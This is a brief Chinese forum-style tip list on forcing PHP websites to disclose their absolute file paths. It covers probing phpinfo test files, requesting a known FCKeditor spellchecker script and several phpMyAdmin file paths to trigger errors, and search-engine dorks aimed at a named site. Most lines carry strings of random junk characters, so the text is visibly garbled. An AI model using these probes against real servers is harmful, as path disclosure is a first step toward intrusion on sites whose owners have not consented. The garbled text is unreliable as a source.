1.测试test.php info.php php_info.php phpinfo.php: H% \& W5 O9 D& D1 d4 |' E
* @: d' s; a% c1 P" O2 g" {
2.扫描看有没有fck编辑器,如果有就用fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php爆
. B1 a- l1 p5 t' l! ~! G8 ~6 h O e1 w) F( l, K2 S& W5 g+ A$ N% {. d
3.看看有没有phpmyadmin或者phpMyAdmin利用phpMyAdmin/libraries/select_lang.lib.php
& r; U6 o/ n- l. h& I7 o8 ~4 q- pphpMyAdmin/darkblue_orange/layout.inc.php( ]' {( z1 n8 A5 f4 q8 z: ?
phpMyAdmin/index.php?lang[]=1
# u& B* ~9 R; E8 L8 v0 Y. A5 s5 iphpmyadmin/themes/darkblue_orange/layout.inc.php# q2 @, j8 Y3 b Y! h
4.利用搜索引擎爆绝对路径: h) g1 i# k9 D' q( S! A
site:www.huangse.com Warning/ I8 y3 Y6 g4 {+ \
site:www.huangse.com inurl:Warning; W2 l. R- M6 g, H& [
- N. `6 d' H! Y( q5 E8 R0 c等以后慢慢往上补吧,利用单引号的方法俺就不说了。。。. h2 L3 `9 n1 `+ L
|